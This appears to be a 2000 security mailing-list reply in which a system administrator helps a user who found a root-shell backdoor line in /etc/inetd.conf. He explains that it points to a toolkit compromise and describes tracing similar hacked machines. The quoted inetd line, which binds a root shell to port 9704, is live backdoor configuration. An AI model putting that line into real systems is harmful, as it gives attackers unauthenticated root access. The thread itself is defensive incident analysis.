Re: Possible widespread hole?

[Jon Lewis <jlewis () LEWIS ORG>]

On Sat, 26 Aug 2000 c_patin () HOTMAIL COM wrote:

> Hi guys,
>       I was snooping around my box yesterday, and noticed the
> following MAJOR hole listed at the bottom of
> /etc/inetd.conf:
> 9704 stream tcp nowait root /bin/sh sh -i
>
> I have since closed the hole, and placed my box behind a

You mean you closed _that_ hole.

> /etc/inetd.conf. Is this possibly some major hole in a
> package that we both installed, or did we just get hacked by
> the same person. Seems a little weird to just be
> coincidence. Any advice or ideas?

Most likely, you were hacked by either the same script kid or by another
using the same tool kit.  It's also likely you have additional holes such
as backdoors in daemons listening for network connections, perhaps even
additional users in /etc/passwd.

In fact last night, I was looking at some client firewall logs and noticed
some linuxconf scans.  I portscaned the originators and found a linux box
in Korea that had been hacked by a dialup user in Indonesia.  The box in
Korea had a similar hole...root shell on port 8888 via a line added to
inetd.conf.  The hacker there had added a few accounts, and was actually
telneting in, using the new accounts, both from their dialup and from
another box in Korea.  That second Korean box had your hole...root shell
on 9704.

----------------------------------------------------------------------
 Jon Lewis *jlewis () lewis org*|  I route
 System Administrator        |  therefore you are
 Atlantic Net                |
_________ http://www.lewis.org/~jlewis/pgp for PGP public key_________